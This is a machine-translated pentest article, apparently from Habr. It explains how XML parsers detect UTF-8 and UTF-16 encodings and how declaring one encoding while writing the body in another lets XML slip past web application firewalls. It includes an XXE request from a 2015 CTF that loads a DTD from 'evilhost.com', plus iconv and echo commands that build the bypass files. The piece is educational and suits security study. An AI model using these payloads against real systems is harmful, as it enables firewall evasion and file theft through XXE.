Evil XML with two encodings

WAFs see white noise instead of a document!

00000000	3C3F 786D 6C20 7665 7273 696F 6E3D 2231	<? xml version = "1
00000010	2E30 2220 656E 636F 6469 6E67 3D22 5554	.0 "encoding =" UT
00000020	462D 3136 4245 2200 3F00 3E00 3C00 6100	F-16BE ".?.>. <. A.
00000030	3E00 3100 3300 3300 3700 3C00 2F00 6100	> .1.3.3.7. <./. A.
00000040	3E	>

The article contains a short story about encoding in XML and about bypassing WAFs with their help.

What encodings work in XML

The specification requires parsers to understand two encodings: UTF-8 and UTF-16. Parsers support more, but these will be enough to attack.

UTF-8 and UTF-16 display the same characters from the Unicode table .

The difference between encodings is how they store the character number.
')
UTF-8
One character - from one to four bytes.

The character code is stored in a pattern:

Number of bytes	Significant bits	Binary code
one	7	0xxxxxxx
2	eleven	110xxxxx 10xxxxxx
3	sixteen	1110xxxx 10xxxxxx 10xxxxxx
four	21	11110xxx 10xxxxxx 10xxxxxx 10xxxxxx

It is impossible to encode characters. The shortest way is correct.

UTF-16
One character - two or four bytes.

The character code is stored in a pattern:

Number of bytes	Significant bits	Binary code
2	sixteen	xxxxxxxx xxxxxxxx
four *	20	110110xx xxxxxxxx 110111xx xxxxxxxx

* 0x010000 is deducted from the code

Writing a character with 4 bytes is called a surrogate pair . The pair consists of two common characters, but from the reserved range: from U + D800 to U + DFFF. The halves of the pair are not valid by themselves.

UTF-16 is of two kinds: UTF-16BE and UTF-16LE (big-endian / little-endian). They have a different byte order.

Big-endian is a “natural” byte order, as in Arabic numerals.
Little-endian - reverse order bytes.

Examples of writing characters in UTF-16BE and UTF-16LE

Encoding	Symbol	Binary code
UTF-16BE	U + 003F	00000000 00111111
UTF-16LE	U + 003F	00111111 00000000
UTF-16BE *	U + 1D6E5	110110 00 00110101 110111 10 1100101
UTF-16LE *	U + 1D6E5	00110101 110110 00 11100101 110111 10

* In four-byte characters, groups of 2 bytes are flipped separately. This is done for backward compatibility with Unicode 1.0, where all characters consisted of only two bytes.

How parsers define encoding

Parsers define encoding in four ways:

External encoding information
Some network protocols have a special field for encoding:

WebDav Encoding Transmission

Most often, these are protocols that are built according to the MIME standard: for example, SMTP, HTTP, and WebDAV.

Byte Order Mark (BOM)

BOM - a symbol with the code U + FEFF.

If the parser finds it at the beginning, it will determine the encoding according to how it is written.

Popular encodings and their BOM

Encoding	Bom	Example
UTF-8	EF BB BF	EF BB BF 3C 3F 78 6D 6C	... <? xml
UTF-16BE	FE FF	FE FF 00 3C 00 3F 00 78 00 6D 00 6C	... <.?. xml
UTF-16LE	FF FE	FF FE 3C 00 3F 00 78 00 6D 00 6C 00	.. <.?. xml

BOM works only at the beginning of the document. In the middle, it is read as a special space or causes an error.

By the first characters of the document

The specification allows the parser to look at the first four bytes and determine the encoding for them:

Encoding	Document start
UTF-8 ISO 646 ASCII	3C 3F 78 6D	<? xm
UTF-16BE	00 3C 00 3F	. <.?
UTF-16LE	3C 00 3F 00	<.?

This only works for documents that start with an XML declaration.

From the XML declaration

The encoding can be specified in the XML declaration:

<?xml version="1.0" encoding="UTF-8"?>

An XML declaration is a string that is written at the very beginning. According to it, the parser understands the format of the document.

 <?xml version="1.0" encoding="ISO-8859-1" ?> <très>là </très>

The document is encoded ISO-8859-1

To read the declaration, the parser, apparently, should already know the encoding. But the declaration is useful for clarifying between similar encodings: for example, compatible with ASCII.

Standard WAF bypass

The easiest option is to change the encoding to incompatible with ASCII and hope that WAF will not understand it.

This method worked on the WAF Bypass competition in 2015. There, participants were required to read the flag through the XXE vulnerability:

Request for XXE operation from the competition

 POST / HTTP/1.1 Host: d3rr0r1m.waf-bypass.phdays.com Connection: close Content-Type: text/xml User-Agent: Mozilla/5.0 Content-Length: 166 <?xml version="1.0"?> <!DOCTYPE root [ <!ENTITY % xxe SYSTEM "http://evilhost.com/waf.dtd"> %xxe; ]> <root> <method>test</method> </root>

One solution is to transcode the request body into UTF-16BE without a BOM:

 cat original.xml | iconv -f UTF-8 -t UTF-16BE > payload.xml

In this document, WAF saw no danger and missed the request.

Bypass using two encodings

Another way to confuse WAF is to encode XML in two encodings at once.

When the parser reads the encoding from the declaration, it immediately switches to it. Even if it is incompatible with the encoding in which the declaration itself is recorded.

If you create a document and declaration in different encodings, then WAFs will not understand anything.

Xerces2 java parser

The declaration is in ASCII, then UTF-16BE:

00000000	3C3F 786D 6C20 7665 7273 696F 6E3D 2231	<? xml version = "1
00000010	2E30 2220 656E 636F 6469 6E67 3D22 5554	.0 "encoding =" UT
00000020	462D 3136 4245 223F 3E00 3C00 6100 3E00	F-16BE "?>. <. A.>.
00000030	3100 3300 3300 3700 3C00 2F00 6100 3E	1.3.3.7. <./. A.>

Teams to form:

 echo -n '<?xml version="1.0" encoding="UTF-16BE"?>' > payload.xml echo '<a>1337</a>' | iconv -f UTF-8 -t UTF-16BE >> payload.xml

libxml2

libxml2 switches the encoding as soon as the attribute reads. Therefore, we change the encoding before closing the declaration:

00000000	3C3F 786D 6C20 7665 7273 696F 6E3D 2231	<? xml version = "1
00000010	2E30 2220 656E 636F 6469 6E67 3D22 5554	.0 "encoding =" UT
00000020	462D 3136 4245 2200 3F00 3E00 3C00 6100	F-16BE ".?.>. <. A.
00000030	3E00 3100 3300 3300 3700 3C00 2F00 6100	> .1.3.3.7. <./. A.
00000040	3E	>

Teams to form:

 echo -n '<?xml version="1.0" encoding="UTF-16BE"' > payload.xml echo '?><a>1337</a>' | iconv -f UTF-8 -t UTF-16BE >> payload.xml

Successful pentest!

Source: https://habr.com/ru/post/340000/

All Articles

Evil XML with two encodings

What encodings work in XML

How parsers define encoding

Standard WAF bypass

Bypass using two encodings

More articles: